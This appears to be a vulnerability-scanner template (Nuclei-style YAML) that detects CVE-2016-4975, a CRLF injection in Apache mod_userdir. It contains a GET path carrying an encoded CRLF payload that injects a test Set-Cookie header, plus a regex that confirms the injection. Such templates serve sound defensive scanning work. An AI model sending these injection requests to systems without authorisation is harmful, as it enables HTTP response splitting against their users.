id: CVE-2016-4975

info:
  name: Apache mod_userdir CRLF injection
  author: melbadry9,nadino,xElkomy
  severity: medium
  description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
  reference:
    - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
    - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
  remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-4975
    cwe-id: CWE-93
  tags: cve,cve2016,crlf,generic,apache

requests:
  - method: GET
    path:
      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'

# Enhanced by cs on 2022/02/14